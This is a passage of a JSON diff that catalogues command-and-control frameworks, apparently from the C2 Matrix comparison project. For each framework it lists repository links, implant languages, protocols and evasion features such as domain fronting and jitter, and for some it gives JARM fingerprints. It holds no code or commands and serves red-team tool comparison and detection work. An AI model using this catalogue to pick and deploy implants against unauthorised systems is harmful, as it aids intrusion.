"Yes", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "Yes", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "0ad0ad0000ad0ad22c42d42d000000088658245da669bb571fc2a62dd80912", + "actively_maint": "Yes", + "slack": "#psempire bloodhoundhq.slack.com", + "slack_members": "1299", + "gh_issues": "61", + "notes": "Dropbox, OneDrive" + }, + { + "name": "EvilOSX", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Marten4n6/EvilOSX", + "site": "", + "twitter": "", + "evaluator": "@cabbagesalad2", + "date": "11/12/2019", + "version": "7.2.1", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "89", + "notes": "" + }, + { + "name": "Faction C2", + "license": "BSD3", + "price": "NA", + "github": "Taken down", + "site": "https://c2lol.blob.core.windows.net/text/faction.txt", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "10/30/2019", + "version": "NA", + "implementation": "install.sh", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": ".NET", + "implant": ".NET", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "#factionc2 bloodhoundhq.slack.com", + "slack_members": "203", + "gh_issues": "38", + "notes": "" + }, + { + "name": "FlyingAFalseFlag", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/monoxgas/FlyingAFalseFlag", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "11/12/2019", + "version": "POC", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "PostOffice EWS SendGrid & Addendum VirusTotal" + }, + { + "name": "FudgeC2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Ziconius/FudgeC2", + "site": "", + "twitter": "@Ziconius", + "evaluator": "@jorgeorchilles", + "date": "2/11/2020", + "version": "Beta", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "Powershell", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#fudgec2 bloodhoundhq.slack.com", + "slack_members": "NA", + "gh_issues": "3", + "notes": "" + }, + { + "name": "GC2-sheet", + "license": "NA", + "price": "NA", + "github": "https://github.com/looCiprian/GC2-sheet", + "site": "", + "twitter": "@loogrz", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Google Sheets and Drive" + }, + { + "name": "GoBot2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/SaturnsVoid/GoBot2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "godoh", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/sensepost/goDoH", + "site": "", + "twitter": "@leonjza", + "evaluator": "@cabbagesalad2", + "date": "10/31/2019", + "version": "1.6", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "Yes", + "server": "Go", + "implant": "Go", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "Yes", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "" + }, + { + "name": "GRAT2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/r3nhat/GRAT2", + "site": "", + "twitter": "@r3n_hat", + "evaluator": "@r3n_hat", + "date": "9/1/2021", + "version": "Beta", + "implementation": "", + "how_to": "", + "slingshot": "No", + "kali": "No", + "server": "Python", + "implant": "C#", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "No", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Encrypted Communication using XOR" + }, + { + "name": "HARS", + "license": "MIT", + "price": "NA", + "github": "https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell", + "site": "", + "twitter": "", + "evaluator": "@leekirkpatrick4", + "date": "3/24/2020", + "version": "POC", + "implementation": "python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C#", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "2", + "notes": "" + }, + { + "name": "Haven", + "license": "Commercial", + "price": "Contact Sales", + "github": "https://pivotlabs.dev/haven/", + "site": "https://docs.pivotlabs.dev/index.html", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "HTTP-RevShell", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/3v4Si0N/HTTP-revshell", + "site": "", + "twitter": "@3v4Si0N", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "ibombshell", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/ElevenPaths/ibombshell", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "11/12/2019", + "version": "0.0.3b", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "5", + "notes": "" + }, + { + "name": "INNUENDO", + "license": "Commercial", + "price": "Contact Sales", + "github": "", + "site": "https://www.immunityinc.com/products/innuendo/", + "twitter": "", + "evaluator": "@daveaitel", + "date": "11/11/2019", + "version": "1.7", + "implementation": "install.sh", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "Yes", + "ftp": "Yes", + "imap": "Yes", + "mapi": "Yes", + "smb": "Yes", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Khepri", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/geemion/Khepri", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Koadic C3", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/zerosum0x0/koadic", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "9/27/2019", + "version": "0xA (10)", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "JScript/VBScript", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "94", + "notes": "Requires valid cert for HTTPS" + }, + { + "name": "Link", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/postrequest/link", + "site": "", + "twitter": "", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "LOLBITS", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Kudaes/LOLBITS", + "site": "", + "twitter": "@Kurosh2907", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MacC2", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/cedowens/MacC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MacShellSwift", + "license": "NA", + "price": "NA", + "github": "https://github.com/cedowens/MacShellSwift", + "site": "", + "twitter": "@cedowens", + "evaluator": "@Adam_Mashinchi", + "date": "11/13/2019", + "version": "N/A", + "implementation": "python", + "how_to": "", + "slingshot": "Yes", + "kali": "", + "server": "Python", + "implant": "Swift", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "No", + "linux": "No", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad000000000000000000000000000eeebf944d0b023a00f510f06a29b4f46", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "" + }, + { + "name": "MACE", + "license": "NA", + "price": "NA", + "github": "https://github.com/nickvangilder/most-average-c2-ever", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MeetC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/CMatri/MeetC2", + "site": "", + "twitter": "", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Merlin", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Ne0nd0g/merlin", + "site": "https://merlin-c2.readthedocs.io/en/latest/", + "twitter": "@merlin_c2", + "evaluator": "@jorgeorchilles", + "date": "11/4/2019", + "version": "0.8.0", + "implementation": "Binary", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Go", + "implant": "Go", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "Yes", + "http3": "Yes", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "aPAKE OPAQUE", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "29d21b20d29d29d21c41d21b21b41d494e0df9532e75299f15ba73156cee38", + "actively_maint": "Yes", + "slack": "#merlin bloodhoundhq.slack.com", + "slack_members": "278", + "gh_issues": "57", + "notes": "Gandalf: https://github.com/r00t0v3rr1d3/merlin/tree/dev" + }, + { + "name": "Metasploit", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/rapid7/metasploit-framework", + "site": "https://metasploit.com", + "twitter": "@metasploit", + "evaluator": "@busterbcook", + "date": "12/4/2019", + "version": "5.0.62", + "implementation": "Ruby", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Ruby", + "implant": "C/Java/PHP/Python", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "RSA", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "07d14d16d21d21d00042d43d000000aa99ce74e2c6d013c745aa52b5cc042d", + "actively_maint": "Yes", + "slack": "metasploit.slack.com", + "slack_members": "4653", + "gh_issues": "3953", + "notes": "" + }, + { + "name": "Meteor", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/degenerat3/meteor", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Meterpeter", + "license": "NA", + "price": "NA", + "github": "https://github.com/r00t-3xp10it/meterpeter", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "" + }, + { + "name": "MicroBackdoor", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Cr4sh/MicroBackdoor", + "site": "", + "twitter": "@d_olex", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MikeC2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/mlgualtieri/PurpleTeamSummit/tree/main/Summit-May2021", + "site": "", + "twitter": "@mlgualtieri", + "evaluator": "Contribute", + "date": "5/25/2021", + "version": "", + "implementation": "C# / PHP", + "how_to": "No", + "slingshot": "No", + "kali": "No", + "server": "PHP", + "implant": "C#", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "No", + "blog": "No", + "c2_matrix_indicators": "", + "jarm": "No", + "actively_maint": "No", + "slack": "No", + "slack_members": "", + "gh_issues": "", + "notes": "The MikeC2 agent is best loaded with MikeDrop" + }, + { + "name": "Mistica", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/IncideDigital/Mistica", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + 